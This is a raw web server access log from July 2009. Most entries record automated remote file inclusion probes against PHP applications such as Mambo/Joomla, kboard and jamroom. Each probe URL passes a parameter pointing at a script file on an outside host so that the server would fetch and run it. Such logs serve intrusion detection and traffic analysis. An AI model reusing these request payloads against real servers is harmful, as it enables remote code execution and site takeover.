74.53.70.114 - - [18/Jul/2009:02:05:46 -0400] "GET /logs/access_log.Q109061500%20%20/embed/day.php?path=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:02:05:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.108.66.188 - - [18/Jul/2009:02:06:15 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.peb.com.ua/ua/id.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.812"
89.108.66.188 - - [18/Jul/2009:02:06:26 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.peb.com.ua/ua/id.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.812"
89.108.66.188 - - [18/Jul/2009:02:06:26 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.peb.com.ua/ua/id.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.812"
89.108.66.188 - - [18/Jul/2009:02:06:26 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.peb.com.ua/ua/id.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.812"
89.108.66.188 - - [18/Jul/2009:02:07:10 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.peb.com.ua/ua/id.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.812"
204.30.3.225 - - [18/Jul/2009:02:07:38 -0400] "GET //include/footer.php?_path[counter]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
204.30.3.225 - - [18/Jul/2009:02:07:38 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
204.30.3.225 - - [18/Jul/2009:02:07:38 -0400] "GET /logs/access_log.Q109062500//include/footer.php?_path[counter]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
74.53.70.114 - - [18/Jul/2009:02:07:45 -0400] "GET /embed/day.php?path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:02:07:45 -0400] "GET /logs/embed/day.php?path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:02:07:45 -0400] "GET /logs/access_log.Q109051900%20%20/embed/day.php?path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:02:07:50 -0400] "GET /logs/access_log.Q109061500%20%20/embed/day.php?path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
78.110.50.132 - - [18/Jul/2009:02:07:50 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://2006.aninite.at/mambots/omilaid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.814"
78.110.50.132 - - [18/Jul/2009:02:07:51 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://2006.aninite.at/mambots/omilaid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.814"
78.110.50.132 - - [18/Jul/2009:02:07:51 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://2006.aninite.at/mambots/omilaid.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.814"
78.110.50.132 - - [18/Jul/2009:02:07:51 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://2006.aninite.at/mambots/omilaid.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.814"
78.110.50.132 - - [18/Jul/2009:02:07:51 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://2006.aninite.at/mambots/omilaid.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.814"
78.110.50.132 - - [18/Jul/2009:02:07:51 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://2006.aninite.at/mambots/omilaid.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.814"
65.55.105.240 - - [18/Jul/2009:02:08:20 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.240 - - [18/Jul/2009:02:08:20 -0400] "GET /CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8 HTTP/1.1" 200 64809 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
59.125.245.181 - - [18/Jul/2009:02:08:51 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
59.125.245.181 - - [18/Jul/2009:02:08:51 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
59.125.245.181 - - [18/Jul/2009:02:08:52 -0400] "GET /logs/access_log.Q109071100%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:02:10:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.125.245.181 - - [18/Jul/2009:02:10:57 -0400] "GET /logs/access_log.Q109071100//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.125.245.181 - - [18/Jul/2009:02:10:58 -0400] "GET /logs/access_log.Q109063000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.110.50.132 - - [18/Jul/2009:02:10:59 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://2006.aninite.at/mambots/omilaid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.814"
78.110.50.132 - - [18/Jul/2009:02:11:00 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://2006.aninite.at/mambots/omilaid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.814"
91.142.209.134 - - [18/Jul/2009:02:11:36 -0400] "GET /logs/access_log.Q109051100//bbshop/shop/index.php?_shop_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:02:11:36 -0400] "GET //bbshop/shop/index.php?_shop_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:02:11:36 -0400] "GET /logs//bbshop/shop/index.php?_shop_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:02:11:36 -0400] "GET /logs/access_log.Q109051100//bbshop/shop/index.php?_shop_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:02:11:36 -0400] "GET //bbshop/shop/index.php?_shop_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:02:11:36 -0400] "GET /logs//bbshop/shop/index.php?_shop_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
66.197.183.21 - - [18/Jul/2009:02:12:14 -0400] "GET /logs/access_log.Q109051900/embed/day.php?path=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:02:12:14 -0400] "GET /logs/access_log.Q109061500/embed/day.php?path=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
91.142.209.134 - - [18/Jul/2009:02:12:24 -0400] "GET /logs/error_log.Q109051100//bbshop/shop/index.php?_shop_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:02:12:24 -0400] "GET /logs/error_log.Q109051100//bbshop/shop/index.php?_shop_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
141.223.5.12 - - [18/Jul/2009:02:13:29 -0400] "GET /logs/error_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/aldiid.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
141.223.5.12 - - [18/Jul/2009:02:13:30 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/aldiid.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
141.223.5.12 - - [18/Jul/2009:02:13:30 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/aldiid.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
114.200.199.144 - - [18/Jul/2009:02:13:59 -0400] "GET /convert/mvcw.php?vwar_root=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:02:13:59 -0400] "GET /logs/access_log.Q109061100%20%20/convert/mvcw.php?vwar_root=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:02:13:59 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:02:15:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.200.199.144 - - [18/Jul/2009:02:16:17 -0400] "GET /logs/access_log.Q109062100%20%20/convert/mvcw.php?vwar_root=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:02:16:38 -0400] "GET /logs/solpot.html?body=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:02:16:38 -0400] "GET /solpot.html?body=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:02:16:57 -0400] "GET /logs/access_log.Q109051900/embed/day.php?path=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:02:16:58 -0400] "GET /logs/access_log.Q109061500/embed/day.php?path=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:02:17:04 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:02:17:04 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:02:17:04 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:02:17:04 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
141.223.5.12 - - [18/Jul/2009:02:17:34 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/aldiid.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
69.10.63.163 - - [18/Jul/2009:02:17:42 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:02:17:42 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:02:17:42 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:02:17:42 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:02:17:44 -0400] "GET //////?mosConfig_absolute_path=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 200 456 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:02:17:44 -0400] "GET /logs/access_log.Q109051000//////?mosConfig_absolute_path=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:02:17:44 -0400] "GET /logs//////?mosConfig_absolute_path=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 200 10003 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:02:18:07 -0400] "GET /logs/access_log.Q109052700//////?mosConfig_absolute_path=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:18:10 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:18:10 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:18:10 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:18:16 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
91.142.209.134 - - [18/Jul/2009:02:18:32 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:02:18:32 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:02:18:32 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:02:18:32 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:02:18:32 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:02:18:32 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.117.172.131 - - [18/Jul/2009:02:18:38 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:02:18:38 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:02:18:38 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.142.209.134 - - [18/Jul/2009:02:18:58 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:02:18:58 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
216.117.172.131 - - [18/Jul/2009:02:19:03 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:02:19:05 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:02:19:07 -0400] "GET /logs/access_log.Q109051900/embed/day.php?path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:02:19:11 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:02:19:11 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:02:19:11 -0400] "GET /logs/access_log.Q109061500/embed/day.php?path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:02:19:23 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:02:19:23 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:02:19:23 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:02:19:27 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:02:19:27 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:02:19:27 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:02:19:30 -0400] "GET /logs/access_log.Q109052700%20%20//////?mosConfig_absolute_path=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:02:19:30 -0400] "GET /logs/access_log.Q109051000%20%20//////?mosConfig_absolute_path=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
212.112.224.125 - - [18/Jul/2009:02:19:34 -0400] "GET /logs/error_log.Q109070500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
212.112.224.125 - - [18/Jul/2009:02:19:34 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.803"
212.112.224.125 - - [18/Jul/2009:02:19:34 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
212.112.224.125 - - [18/Jul/2009:02:19:36 -0400] "GET /logs/access_log.Q109070500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
216.117.172.131 - - [18/Jul/2009:02:19:52 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:02:20:07 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:02:20:22 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:20:24 -0400] "GET /logs/access_log.Q109061200%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:20:29 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
123.143.98.5 - - [18/Jul/2009:02:20:31 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
123.143.98.5 - - [18/Jul/2009:02:20:31 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
123.143.98.5 - - [18/Jul/2009:02:20:31 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
123.143.98.5 - - [18/Jul/2009:02:20:36 -0400] "GET /logs/access_log.Q109070500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
209.59.12.99 - - [18/Jul/2009:02:20:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.32.40.221 - - [18/Jul/2009:02:20:53 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:02:20:56 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
210.205.6.233 - - [18/Jul/2009:02:21:05 -0400] "GET //////?mosConfig_absolute_path=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 200 456 "-" "Mozilla/5.0"
210.205.6.233 - - [18/Jul/2009:02:21:05 -0400] "GET /logs//////?mosConfig_absolute_path=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 200 10003 "-" "Mozilla/5.0"
210.205.6.233 - - [18/Jul/2009:02:21:06 -0400] "GET /logs/access_log.Q109051000//////?mosConfig_absolute_path=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:02:21:09 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:02:21:10 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
91.142.209.134 - - [18/Jul/2009:02:21:33 -0400] "GET /logs/access_log.Q109051100%20//bbshop/shop/index.php?_shop_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:02:21:42 -0400] "GET /logs/access_log.Q109051100%20//bbshop/shop/index.php?_shop_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
190.144.44.36 - - [18/Jul/2009:02:21:46 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:02:21:46 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:02:21:46 -0400] "GET /logs/access_log.Q109070500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:02:21:46 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
210.205.6.233 - - [18/Jul/2009:02:21:58 -0400] "GET /logs/access_log.Q109052700//////?mosConfig_absolute_path=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
